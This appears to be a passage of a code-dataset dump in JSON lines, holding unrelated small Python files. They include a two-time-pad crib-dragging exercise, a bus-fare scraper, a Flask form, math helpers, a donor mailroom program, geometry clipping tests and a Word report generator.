get_val(a)\n rest = rest * 16 + get_val(b)\n\n return chr(rest)\n\n\ndef get_m(hex_text):\n rest = ''\n\n i = 0\n\n print(hex_text + \" should be sliced\")\n\n while i < 10:\n rest += get_char(hex_text[i: i + 2])\n i += 2\n\n return rest\n\n\nwith open('cipher_texts.txt', 'r') as myfile:\n content = myfile.read()\n data = content.split('\\n')\n\ncopher_text = data[0]\ndata.pop(0)\n\nc1 = data[0]\nc2 = data[1]\n\nm1_xor_m2 = ''\n\nmin_length = min(len(c1), len(c2))\n\nfor i in range(0, min_length):\n m1_xor_m2 += '%x' % (int(c1[i], 16) ^ int(c2[i], 16))\n\nprint(m1_xor_m2)\n\ndees = binascii.hexlify(b' the ')\n\nfor i in range(0, min_length - 11):\n substr = m1_xor_m2[i: i + 10]\n print(substr + \" is substr\")\n mb = '%x' % (int(dees, 16) ^ int(substr, 16))\n print(mb)\n print(get_m(mb) + \" for \" + str(i))\n","sub_path":"week 1/otp.py","file_name":"otp.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187804519","text":"# -*- coding: utf-8 -*-\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, TextAreaField, SubmitField\nfrom wtforms.validators import DataRequired, Length\n\n\nclass ContentForm(FlaskForm):\n title = StringField('Title',\n validators=[DataRequired(\"Title is required!\"),\n Length(min=1, max=150, message=\"Title must be between 1 and 150 characters long.\")])\n tags = StringField('Tags',\n validators=[DataRequired(\"Tags are required!\"),\n Length(min=1, max=150, message=\"Sum len of tags must be between 1 and 150 characters long.\")])\n text = TextAreaField()\n\n submit = SubmitField(\"Add content\")\n","sub_path":"storage/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"382546727","text":"from __future__ import division, print_function\n\n# # infinite loop below because k never becomes greater than M\n# s = 0; k = 1; M = 100\n# while k < M:\n# s += 1/k\n# print(s)\n\ns = 0\nk = 1\nM = 100\nwhile s < M:\n s += 1/k\nprint(s)\n","sub_path":"2-12_sum_while.py","file_name":"2-12_sum_while.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"155791836","text":"# stripped down BoltBus script \nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Response \nfrom scrapy.http import TextResponse \nimport time\n\n# set dates, origin, destination \ncityOrigin=\"Baltimore\"\ncityDeparture=\"New York\"\nday_array=[0]\nbrowser = webdriver.Chrome()\n\n# we are going the day of the days of the month from 15,16,...,25\n# there is a discrepancy between the index of the calendar days and the day itself: for example day[10] may correspond to Feb 7th\nfor day in day_array:\n\n # Create a new instance of the Firefox driver\n browser.get(\"http://www.boltbus.com\")\n\n # click on \"region\" tab\n elem_0=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_lstRegion_textBox\")\n elem_0.click()\n time.sleep(5) \n\n # select Northeast\n elem_1=browser.find_element_by_partial_link_text(\"Northeast\")\n elem_1.click()\n time.sleep(5)\n\n # click on origin city\n elem_2=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_lstOrigin_textBox\")\n elem_2.click()\n time.sleep(5)\n\n # select origin city\n elem_3=browser.find_element_by_partial_link_text(cityOrigin)\n elem_3.click()\n time.sleep(5)\n\n # click on destination city \n elem_4=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_lstDestination_textBox\")\n elem_4.click()\n time.sleep(5)\n\n # select destination city \n elem_5=browser.find_element_by_partial_link_text(cityDeparture)\n elem_5.click()\n time.sleep(5)\n\n # click on travel date\n travel_date_elem=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_imageE\")\n travel_date_elem.click() \n\n # gets day rows of table\n date_rows=browser.find_elements_by_class_name(\"daysrow\") \n\n # select actual day (use variable day)\n # NOTE: you must make sure these day elements are \"clickable\"\n days=date_rows[0].find_elements_by_xpath(\"..//td\")\n days[day].click()\n time.sleep(3) \n\n # retrieve actual departure date from browser\n depart_date_elem=browser.find_element_by_id(\"ctl00_cphM_forwardRouteUC_txtDepartureDate\")\n depart_date=str(depart_date_elem.get_attribute(\"value\"))\n\n # PARSE TABLE\n\n # convert html to \"nice format\"\n text_html=browser.page_source.encode('utf-8')\n html_str=str(text_html)\n\n # this is a hack that initiates a \"TextResponse\" object (taken from the Scrapy module)\n resp_for_scrapy=TextResponse('none',200,{},html_str,[],None)\n\n # takes a \"TextResponse\" object and feeds it to a scrapy function which will convert the raw HTML to a XPath document tree\n hxs=HtmlXPathSelector(resp_for_scrapy)\n\n # the | sign means \"or\"\n table_rows=hxs.select('//tr[@class=\"fareviewrow\"] | //tr[@class=\"fareviewaltrow\"]')\n row_ct=len(table_rows)\n\n for x in range(row_ct):\n\n cur_node_elements=table_rows[x]\n travel_price=cur_node_elements.select('.//td[@class=\"faresColumn0\"]/text()').re(\"\\d{1,3}\\.\\d\\d\")\n\n # I use a mixture of xpath selectors to get me to the right location in the document, and regular expressions to get the exact data\n\n # actual digits of time \n depart_time_num=cur_node_elements.select('.//td[@class=\"faresColumn1\"]/text()').re(\"\\d{1,2}\\:\\d\\d\")\n\n # AM or PM (time signature)\n depart_time_sig=cur_node_elements.select('.//td[@class=\"faresColumn1\"]/text()').re(\"[AP][M]\")\n\n # actual digits of time \n arrive_time_num=cur_node_elements.select('.//td[@class=\"faresColumn2\"]/text()').re(\"\\d{1,2}\\:\\d\\d\")\n\n # AM or PM (time signature)\n arrive_time_sig=cur_node_elements.select('.//td[@class=\"faresColumn2\"]/text()').re(\"[AP][M]\")\n\n print(\"Depart date: \" + depart_date)\n print(\"Depart time: \" + depart_time_num[0] + \" \" + depart_time_sig[0])\n print(\"Arrive time: \" + arrive_time_num[0] + \" \" + arrive_time_sig[0])\n print(\"Cost: \" + \"$\" + travel_price[0]) \n print(\"\\n\")","sub_path":"scrapy_selenium_bus_template_clicking_parsing.py","file_name":"scrapy_selenium_bus_template_clicking_parsing.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"389076553","text":"def iterativeFactorial(number):\n\tx = 1\n\tfor i in range (1, number+1):\n\t\tx *= i\n\treturn x\n\n\ndef factorial(number):\n\tif number == 0:\n\t\treturn 1\n\telse:\n\t\treturn number*factorial(number-1)\n\ndef fibonacci(number):\n\tif number == 0:\n\t\treturn 0\n\telif number == 1:\n\t\treturn 1\n\telse:\n\t\treturn fibonacci(number-1) + fibonacci(number-2)\n\ndef iterativeFibonacci(number):\n\ti = 1\n\tj = 0\n\tfor k in range (1, number+1):\n\t\tt = i+j\n\t\ti = j\n\t\tj = t\n\treturn j\n\ndef mdc(a, b):\n\tif b == 0:\n\t\treturn a\n\telse:\n\t\treturn mdc(b, a%b)\n\ndef prime(number):\n\tif number == 1:\n\t\treturn 'not prime'\n\telif number == 2:\n\t\treturn 'is prime'\n\telse:\n\t\td = 2\n\t\twhile d < number:\n\t\t\tif(number%d == 0):\n\t\t\t\treturn 'not prime'\n\t\t\telse:\n\t\t\t\td += 1\n\t\treturn 'is prime'\n\n#print(iterativeFactorial(1))\n#print(factorial(5))\n#print(fibonacci(29))\nprint(iterativeFibonacci(29))\nprint(mdc(2, 2))\nprint(prime(611953))","sub_path":"Class_1/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"523230526","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 08 18:49:02 2016\n\n@author: rajat\n\"\"\"\n\nimport numpy as np\nfrom scipy.spatial import distance\n\npositionDataFile = open('position.txt', 'rb')\npositionData = []\n\nfor data in positionDataFile:\n info = data.split(' ')\n x,y = info[0], info[1]\n if x=='None' and y==' None':\n x,y = 0,0\n else:\n x,y = float(x), float(y)\n positionData.append([x,y])\n\nlinear_velocity = []\n\n\n#atan2: finds the angle in radians between the positive x-axis and points given by coordinates (x,y)\nfor i in range(1,len(positionData)-1):\n point1 = np.asarray(positionData[i-1])\n point2 = np.asarray(positionData[i])\n distance = distance.euclidean(point1, point2)\n velocity = distance/(t[i]- t[i-1])\n linear_velocity.append(velocity)\n \n","sub_path":"Miscellaneous/linearVelocity.py","file_name":"linearVelocity.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"493147388","text":"#!/usr/bin/env python3.6\nimport datetime as dt\n\n\ndef prompt_for_amount(name):\n \"\"\" Prompt user for donation amount and return value. \"\"\"\n amount = input(f\"How much did {name} donate? \")\n\n return ''.join(amount.split('$')[-1].split(','))\n\n\ndef add_new_donor(donors, name, amount):\n \"\"\" Add new donor and donation amount to donor database. \"\"\"\n donors[name] = dict([('name', name), ('donations', [float(amount)]),\n ('latest_don', float(amount))])\n\n\ndef add_donation_to_history(donors, name, amount):\n \"\"\" Add new donation to existing donor's records \"\"\"\n donors[name]['donations'].append(float(amount))\n donors[name]['latest_don'] = float(amount)\n\n\ndef verify_add_donor(name):\n \"\"\" \"\"\"\n while True:\n response = input(f\"Are you sure you want to add {name}? [Y/n] \")\n\n # 'Y' is default response.\n if response == '': response = 'y'\n \n if response.lower() in ['y', 'n', 'yes', 'no']: return response.lower()\n\n\ndef list_donor_names(donors):\n \"\"\" Print current list of donors to screen. \"\"\"\n [print(k) for k in donors.keys()]\n\n return\n\n\ndef blank_lines(number_lines=1):\n \"\"\" Return number_lines '\\n' as string \"\"\"\n return '\\n' * (number_lines + 1)\n \n\ndef letter_date():\n \"\"\" Return today's date, formatted for letter preamble. \"\"\"\n return dt.datetime.now().strftime('%d %B %Y')\n\n\ndef letter_preamble(name):\n \"\"\" Return Thank You letter preamble. \"\"\"\n preamble = letter_date()\n preamble += blank_lines(2)\n preamble += f\"Dear {name},\"\n preamble += blank_lines()\n\n return preamble\n\n\ndef letter_body(amount):\n \"\"\" Return body of Thank You letter. \"\"\"\n body = (\n f'Thank you for your generous donation of ${float(amount):,.2f}. Your gracious support '\n 'helps us continue our important work doing what we do. We look forward to continuing to '\n 'partner with you in the future. Please contact us if you have any questions or have any '\n 'interest in arranging a visit.'\n )\n\n return body\n\n\ndef letter_closing():\n \"\"\" Return closing and signature of Thank You letter. \"\"\"\n closing = blank_lines()\n closing += 'Sincerely,'\n closing += blank_lines(2)\n closing += 'Mr. F\\nActing Director\\n(800) 555-1234'\n\n return closing\n\n\ndef compose_letter(name, amount):\n \"\"\" Print donation Thank You letter to screen. \"\"\"\n letter = letter_preamble(name)\n letter += letter_body(amount)\n letter += letter_closing()\n\n return letter\n\n\ndef print_letter(letter_content):\n \"\"\" Style beginning and end of letter and print to console. \"\"\"\n print(f'\\n{letter_content}\\n')\n\n\ndef send_letters_all(donors):\n \"\"\" Write Thank You letters to file for everyone in donor dict. \"\"\"\n # TODO prompt user for dir to store letters in, test for existence,\n # and create if necessary. Use letters/ as default\n for k, v in donors.items():\n fout_path = 'letters/'\n fout_name = f'{k.replace(\",\", \"\").replace(\" \", \"_\")}.txt'\n\n fout_path += fout_name\n with open(fout_path, 'w') as file:\n file.write(compose_letter_dict(donors, k))\n\n return\n\n\ndef compose_letter_dict(donors, name):\n \"\"\" Return Thank You letter composed from single template, filled with dict. \"\"\"\n letter = (\n f'{letter_date()}'\n f'{blank_lines(2)}'\n 'Dear {name},\\n\\nThank you for your generous donation of ${latest_don:,.2f}. '\n 'Your gracious support helps us continue our important work doing what we do. '\n 'We look forward to continuing to partner with you in the future. Please contact '\n 'us if you have any questions or have any interest in arranging a visit.'\n f'{blank_lines()}Sincerely,{blank_lines(2)}Mr. F\\nActing Director\\n'\n '(800) 555-1234'.format(**donors[name])\n )\n\n return letter\n \n\ndef hor_bar(count=35):\n \"\"\" \"\"\"\n return \"-\" * count\n\n\ndef main_menu_prompt():\n \"\"\" \"\"\"\n response = input(\" (1) Send a 'Thank You'\\n\"\n \" (2) Create a Report\\n\"\n \" (3) Send letters to everyone\\n\"\n \" (4) quit\\n\"\n \"--> \")\n\n if response.lower() in ['1', 'send a thank you', 'thank you']:\n return 0\n\n elif response.lower() in ['2', 'create', 'report', 'create a report']:\n return 1\n\n elif response.lower() in ['3', 'send letters to everyone']:\n return 2\n\n elif response.lower() in ['4', 'q', 'quit', 'exit']:\n return 3\n\n\ndef thank_you_prompt(donors):\n \"\"\" Direct Thank You letter menu user input \"\"\"\n print(hor_bar())\n print(\"[Send 'Thank You' menu]\\n\"\n \"Type 'menu' to return to main menu.\")\n \n while True:\n response = input('--> ')\n\n if response in ['list', 'l']:\n list_donor_names(donors)\n\n elif response in ['m', 'menu']: break\n\n elif response.lower() not in [k.lower() for k in donors.keys()]:\n new_donor = response\n verify = verify_add_donor(new_donor)\n\n if verify[0] == 'y':\n amount = prompt_for_amount(new_donor)\n add_new_donor(donors, new_donor, amount)\n\n # letter = compose_letter(new_donor, amount)\n letter = compose_letter_dict(donors, new_donor)\n print_letter(letter)\n \n return\n\n elif response.lower() in [k.lower() for k in donors.keys()]:\n donor = response\n new_amount = prompt_for_amount(donor)\n add_donation_to_history(donors, donor, new_amount)\n\n letter = compose_letter(donor, new_amount)\n print_letter(letter)\n\n return\n\n return\n\n\ndef report_prompt():\n \"\"\" Direct report menu user input. \"\"\"\n print(hor_bar())\n print(\"[Donor Summary Report]\\n\")\n\n print(assemble_report())\n\n return\n # return donors\n\n\ndef assemble_report():\n \"\"\" Return nicely formatted donor report. \"\"\"\n col_widths = [25, 20, 12, 20]\n headers = ['Donor Name', 'Total Given', 'Num Gifts', 'Average Gift']\n\n header_row = assemble_header(headers, col_widths)\n hor_line = hor_bar(len(header_row))\n table_body = assemble_table(col_widths)\n\n return f'{header_row}\\n{hor_line}\\n{table_body}'\n\n\ndef assemble_header(headers, col_widths):\n \"\"\" Return header row for donor report table. \"\"\"\n header = f'{headers[0]:<{col_widths[0]-1}}'\n\n count = 1\n for field in headers[1:]:\n header += f'|{headers[count]:^{col_widths[count]+1}}'\n count+=1\n\n return header\n\n\ndef assemble_table(col_widths):\n \"\"\" Return table body, fetching all computed values from other functions. \"\"\"\n table = ''\n\n for k, v in donors.items():\n total = get_total(k)\n num_gifts = get_num_gifts(k)\n avg_gift = get_avg_gift(k)\n # import pdb; pdb.set_trace()\n table += (f'{k:<{col_widths[0]}}${total:{col_widths[1]},.2f}'\n f'{num_gifts:{col_widths[2]}d} ${avg_gift:{col_widths[3]},.2f}\\n')\n\n return table\n\n\ndef get_total(name):\n \"\"\" Return total donations for supplied donor name \"\"\"\n return sum(donors[name]['donations'])\n\n\ndef get_num_gifts(name):\n \"\"\" Return total number of gifts given by supplied donor name. \"\"\"\n return len(donors[name]['donations'])\n\n\ndef get_avg_gift(name):\n \"\"\" Return the average of all of the supplied donor's donations. \"\"\"\n return get_total(name) / get_num_gifts(name)\n\n\ndef init_database():\n # Initialize 5 donors and at least 1 donation for each.\n donors = dict([('William Gates, III', {'name': 'William Gates, III',\n 'donations': [1, 5, 100000000],\n 'latest_don': 100000000}),\n ('Mark Zuckerberg', {'name': 'Mark Zuckerberg',\n 'donations': [378000, 5000, 20.01],\n 'latest_don': 20.01}),\n ('Jeff Bezos', {'name': 'Jeff Bezos',\n 'donations': [29000000, 34000, 709000],\n 'latest_don': 709000}),\n ('Paul Allen', {'name': 'Paul Allen',\n 'donations': [750000, 513895, 30592.50],\n 'latest_don': 30592.50}),\n ('John Ferrell', {'name': 'John Ferrell',\n 'donations': [520000000000],\n 'latest_don': 520000000000})])\n\n return donors\n \n\ndef main(donors):\n \"\"\" Show main menu, prompting user for selection. \"\"\"\n while True:\n print(hor_bar())\n print('[Main menu]\\n'\n 'What would you like to do? (Select one):')\n\n switch_func_dict = {\n 0: thank_you_prompt,\n 1: report_prompt,\n 2: send_letters_all(donors)\n }\n\n response = None\n\n while response not in switch_func_dict.keys():\n response = main_menu_prompt()\n\n if response == 3: return\n\n try:\n switch_func_dict.get(response)()\n break\n except TypeError:\n print(\"Invalid input. Please select one:\")\n\n return\n\n\nif __name__ == '__main__':\n print('\\nWelcome to the Mailroom applicaton.')\n\n donors = init_database()\n \n main(donors)\n\n print('\\nThank you for using Mailroom. Have a nice day!')\n","sub_path":"students/kevin/session06/mailroom4.py","file_name":"mailroom4.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354507009","text":"import numpy as np\nimport os, sys\nfrom .search import *\nfrom .inverted_matrix import *\nfrom .postings import *\nfrom .helpers import tokenize_and_stem\nfrom collections import defaultdict\nfrom scipy.sparse.linalg import svds\nfrom nltk.stem import PorterStemmer\n\ndef tfidf_matrix(tf,idf,companies,word_in,k=3):\n\tps = PorterStemmer()\n\tindex_to_word = list(idf.keys())\n\tfor company in companies:\n\t\tif ps.stem(company) in index_to_word:\n\t\t\tindex_to_word.remove(ps.stem(company))\n\tword_to_index = {index_to_word[i]:i for i in range(len(index_to_word))}\n\tindex_to_companies = companies\n\tcompany_to_index = {index_to_companies[i]:i for i in range(len(index_to_companies))}\n\tn_words = len(index_to_word)\n\tn_comps = len(companies)\n\tmat = np.zeros((n_words,n_comps))\n\tfor word in index_to_word:\n\t\tfor comp, freq in tf[word]:\n\t\t\tmat[word_to_index[word]][company_to_index[comp]] = freq * idf[word]\n\twords_compressed, _, docs_compressed = svds(mat, k=int(n_comps/2))\n\tdocs_compressed = docs_compressed.transpose()\n\n\t\n\tsims = []\n\tfor word in word_in:\n\t\tif word in word_to_index:\n\t\t\tif sims == []:\n\t\t\t\tsims = words_compressed.dot(words_compressed[word_to_index[word],:])\n\t\t\telse:\n\t\t\t\tsims = np.add(sims,words_compressed.dot(words_compressed[word_to_index[word],:]))\n\tif sims != []:\n\t\tasort = np.argsort(-sims)[:k+1]\n\t\treturn [(index_to_word[i],sims[i]/sims[asort[0]]) for i in asort[1:]]\n\telse:\n\t\treturn []","sub_path":"app/backend/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"631443039","text":"import sys\nimport codecs\n\nPYTHON_VERSION = sys.version_info.major\nSTRINGTYPE = str if PYTHON_VERSION == 3 else basestring\nINPUTFUNC = input if PYTHON_VERSION == 3 else raw_input\nOPENER = open if PYTHON_VERSION == 3 else codecs.open\n\n# quicker access to search, exclude, show types\nfrom itertools import product\n_starts = ['M', 'N', 'B', 'G', 'D', 'H']\n\n_ends = ['W', 'L', 'I', 'S', 'P', 'X', 'R', 'F']\n_others = ['A', 'ANY', 'ANYWORD', 'C', 'SELF', 'V', 'K', 'T']\n_prod = list(product(_starts, _ends))\n_prod = [''.join(i) for i in _prod]\n_letters = sorted(_prod + _starts + _ends + _others)\n\n_adjacent_start = ['A{}'.format(i) for i in range(1, 9)] + \\\n ['Z{}'.format(i) for i in range(1, 9)]\n\n_adjacent = [''.join(i) for i in list(product(_adjacent_start, _prod))]\n\nLETTERS = sorted(_letters + _adjacent)\n\n# translating search values intro words\ntransshow = {'f': 'Function',\n 'l': 'Lemma',\n 'r': 'Distance from root',\n 'w': 'Word',\n 't': 'Trees',\n 'i': 'Index',\n 'n': 'N-grams',\n 'p': 'POS',\n 'x': 'Word class',\n 's': 'Sentence index'}\n\ntransobjs = {'g': 'Governor',\n 'd': 'Dependent',\n 'm': 'Match',\n 'h': 'Head'}\n\n# modify this if your conll-style data is different from what is provided by the\n# parser plus post-processing. data must tart with 's' for sentence index and 'i'\n# for token index. after that, you can have whichever fields you like, and should \n# be able to access them using normal corpkit syntax.\n\n# 'd', for deps, is a comma-sep string of dependent token indices\n\n# 'c', for coref, has an artibrary number representing a dependency chain. the\n# head of a mention is marked with an asterisk.\n\n# y and z are left as custom fields, not really in use now, but theoretically\n# they are searchable\n\n# default: sent, index, word, lem, pos, ner, gov, func, deps, coref, custom * 3\nCONLL_COLUMNS = ['s', 'i', 'w', 'l', 'p', 'n', 'g', 'f', 'd', 'c', 'y', 'z']\n\n# what the longest possible speaker ID is. this prevents huge lines with colons\n# from getting matched unintentionally\nMAX_SPEAKERNAME_SIZE = 40\n\n\nREPEAT_PARSE_ATTEMPTS = 3\n","sub_path":"corpkit/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"1855383","text":"from app.database.engine import engine\nfrom sqlalchemy.sql import text\n\nconnect = engine.connect()\n\ndef get_enums(enum):\n stmt = text(\n \"SELECT e.enumlabel as name FROM pg_enum e JOIN pg_type t ON e.enumtypid = t.oid WHERE t.typname = :x\"\n )\n query = stmt.bindparams(x=enum)\n result = connect.execute(query)\n labels = list()\n for item in result:\n labels.extend(item)\n return labels\n","sub_path":"app/database/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"157487647","text":"# -*- coding:utf-8 -*-\n'''\n@author:coyote\n@datetime:2019/1/25 22:07\n@file: log.py\n@function:\n'''\nimport datetime\nimport csv\n\n\n# 日志管理系统\nclass LogMangerSys:\n def __init__(self):\n self.buy_log = []\n\n def get_log_time(self, format):\n \"\"\"\n 获取写日志当前时间\n :param format: 日期格式化方式,如:\"%Y%m%d\"\n :return:\n \"\"\"\n log_time = datetime.datetime.now().strftime(format)\n return log_time\n\n def write_log_append_csv(self, file_path, file_name, header, data):\n \"\"\"\n 将日志追加到CSV文件\n :param file_path: 文件路径\n :param file_name: 文件名称\n :param header: 文件标题\n :param data: 日志数据\n :return:\n \"\"\"\n # 写日志时间\n log_time = self.get_log_time(\"%Y%m%d\")\n print(\"log_time:{}\".format(log_time))\n # 文件格式:file_path + file_name + log_time\n # 输出的CSV文件名称\n new_file_name = file_path + file_name + \"_\" + log_time + \".csv\"\n with open(new_file_name, 'a', newline='', encoding='utf-8') as f:\n writer = csv.DictWriter(f, header)\n # writer.writeheader()\n writer.writerows(data)\n\n def buy_log_manager(self, user_id, money, *items):\n \"\"\"\n 用户购买日志写入到文件\n :param user_id: 用户编号\n :param money: 消费金额\n :param items: 购买商品列表 格式:[{\"user_id\":\"user_id1\",\"money\":20,\"items\":(items1,item2......)}]\n :return:\n \"\"\"\n buy_log = {\"user_id\": user_id, \"money\": money, \"items\": items}\n self.buy_log.append(buy_log)\n print(buy_log)\n # -----------------V4 start------------------\n\n item_str = \"\" # 格式:老干妈|王中王\n for item in items:\n if item_str == \"\":\n item_str = item\n else:\n item_str += '|' + item\n file_path = \"\"\n file_name = \"user_buy_log\"\n header = [\"user_id\", \"money\", \"item\"]\n buy_log = [{\"user_id\": user_id, \"money\": money, \"item\": item_str}]\n # 调用自身将日志数据写入到CSV文件的方法\n self.write_log_append_csv(file_path, file_name, header, buy_log)\n","sub_path":"day7/infrastructure/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"543722156","text":"# 16.1 Number Swapper\n\"\"\"\nWrite a function to swap a number in place (that is, without using temporary variables).\n\"\"\"\n\n# We can simply add up the two numbers which allow us to switch variables by subtracting.\n\ndef number_swapper(a, b):\n a = a + b\n b = a - b\n a = a - b\n return a, b\n\n# There must be a way to do this with bit manipulation as well.\n\n\n# Function Call Here\na = 5\nb = 9\nprint(a, b)\na, b = number_swapper(a, b)\nprint(a, b)","sub_path":"Coding Challenges/Exercise Problems/H Moderate/16.1 Number Swapper.py","file_name":"16.1 Number Swapper.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610108113","text":"from hypothesis import given\nfrom orient.planar import (Relation,\n segment_in_multipolygon,\n segment_in_multisegment,\n segment_in_segment)\n\nfrom clipping.planar import intersect_multisegment_with_multipolygon\nfrom tests.utils import (MultipolygonWithMultisegment,\n is_multisegment,\n reverse_multipolygon,\n reverse_multipolygon_borders,\n reverse_multipolygon_holes,\n reverse_multipolygon_holes_contours,\n reverse_multisegment,\n reverse_multisegment_endpoints,\n to_sorted_segment)\nfrom . import strategies\n\n\n@given(strategies.multipolygons_with_multisegments)\ndef test_basic(multipolygon_with_multisegment: MultipolygonWithMultisegment\n ) -> None:\n multipolygon, multisegment = multipolygon_with_multisegment\n\n result = intersect_multisegment_with_multipolygon(multisegment,\n multipolygon)\n\n assert is_multisegment(result)\n\n\n@given(strategies.rational_multipolygons_with_multisegments)\ndef test_properties(multipolygon_with_multisegment\n : MultipolygonWithMultisegment) -> None:\n multipolygon, multisegment = multipolygon_with_multisegment\n\n result = intersect_multisegment_with_multipolygon(multisegment,\n multipolygon)\n\n assert all(segment_in_multisegment(segment, multisegment)\n in (Relation.EQUAL, Relation.COMPONENT)\n for segment in result.segments)\n assert all(segment_in_multipolygon(segment, multipolygon)\n in (Relation.COMPONENT, Relation.ENCLOSED, Relation.WITHIN)\n for segment in result.segments)\n assert all(to_sorted_segment(segment) in result.segments\n # in case of cross\n or any(segment_in_segment(result_segment, segment)\n is Relation.COMPONENT\n for result_segment in result.segments)\n for segment in multisegment.segments\n if (segment_in_multipolygon(segment, multipolygon)\n in (Relation.CROSS, Relation.COMPONENT, Relation.ENCLOSED,\n Relation.WITHIN)))\n\n\n@given(strategies.empty_multipolygons_with_multisegments)\ndef test_left_absorbing_element(empty_multipolygon_with_multisegment\n : MultipolygonWithMultisegment) -> None:\n empty_multipolygon, multisegment = empty_multipolygon_with_multisegment\n\n result = intersect_multisegment_with_multipolygon(multisegment,\n empty_multipolygon)\n\n assert not result.segments\n\n\n@given(strategies.multipolygons_with_empty_multisegments)\ndef test_right_absorbing_element(multipolygon_with_empty_multisegment\n : MultipolygonWithMultisegment) -> None:\n multipolygon, empty_multisegment = multipolygon_with_empty_multisegment\n\n result = intersect_multisegment_with_multipolygon(empty_multisegment,\n multipolygon)\n\n assert not result.segments\n\n\n@given(strategies.multipolygons_with_multisegments)\ndef test_reversals(multipolygon_with_multisegment: MultipolygonWithMultisegment\n ) -> None:\n multipolygon, multisegment = multipolygon_with_multisegment\n\n result = intersect_multisegment_with_multipolygon(multisegment,\n multipolygon)\n\n assert result == intersect_multisegment_with_multipolygon(\n multisegment, reverse_multipolygon(multipolygon))\n assert result == intersect_multisegment_with_multipolygon(\n multisegment, reverse_multipolygon_borders(multipolygon))\n assert result == intersect_multisegment_with_multipolygon(\n multisegment, reverse_multipolygon_holes(multipolygon))\n assert result == intersect_multisegment_with_multipolygon(\n multisegment, reverse_multipolygon_holes_contours(multipolygon))\n assert result == intersect_multisegment_with_multipolygon(\n reverse_multisegment(multisegment), multipolygon)\n assert result == intersect_multisegment_with_multipolygon(\n reverse_multisegment_endpoints(multisegment), multipolygon)\n","sub_path":"tests/planar_tests/test_intersect_multisegment_with_multipolygon.py","file_name":"test_intersect_multisegment_with_multipolygon.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461132051","text":"# Global import\nfrom docx import Document\nfrom docx.shared import Inches, Pt, RGBColor\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.enum.table import WD_ALIGN_VERTICAL, WD_TABLE_ALIGNMENT\nfrom pandas import Timestamp\n# Local import\n\n\nclass Documents(object):\n\n def __init__(self, path, driver):\n self.path = path\n self.driver = driver\n self.document = None\n\n def save_document(self, name):\n if self.document is not None:\n self.document.save(self.driver.join(self.path, name))\n else:\n raise ValueError('Document is None')\n\n\nclass WordDocument(Documents):\n def __init__(self, path, driver, document_settings):\n Documents.__init__(self, path, driver)\n \n # Create document \n self.document = Document()\n \n # Set document global parameter\n self.field_size = document_settings.get('field_size', 40)\n\n # Set margin\n sec = self.document.sections[0]\n sec.top_margin = Inches(document_settings.get('top_margin', 1.))\n sec.left_margin = Inches(document_settings.get('left_margin', 0.5))\n sec.right_margin = Inches(document_settings.get('right_margin', 0.5))\n\n # Set font type\n style = self.document.styles['Normal']\n font = style.font\n font.name = document_settings.get('font_name', 'DejaVu Sans Mono')\n font.size = Pt(int(document_settings.get('font_size', 8)))\n\n def save_document(self, name):\n\n # Add footer to document\n self.add_footer('Edition du document: {}'.format(Timestamp.now().date()))\n Documents.save_document(self, name)\n\n def add_title(self, title, font_size=12, text_align='center', color='000000', left_indent=0.,\n space_before=0.12, space_after=0.12):\n\n h = self.document.add_heading(title, 1)\n h.paragraph_format.left_indent = Inches(left_indent)\n\n if text_align == 'center':\n h.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n elif text_align == 'left':\n h.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.LEFT\n\n if text_align == 'right':\n h.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\n\n h.style.font.bold = True\n h.style.font.color.rgb = RGBColor.from_string(color)\n h.style.font.size = Pt(font_size)\n h.paragraph_format.space_before = Inches(space_before)\n h.paragraph_format.space_after = Inches(space_after)\n\n def add_table(self, df, index_column=-1, left_indent=0.15):\n\n # Load values from dataframe\n l_col_names = df.columns\n l_values = [[row[c] for c in l_col_names] for _, row in df.iterrows()]\n\n table = self.document.add_table(rows=1, 